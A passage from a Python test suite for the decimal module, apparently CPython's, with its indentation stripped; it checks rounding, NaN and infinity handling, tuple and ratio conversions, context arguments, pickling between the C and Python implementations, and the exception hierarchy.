self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
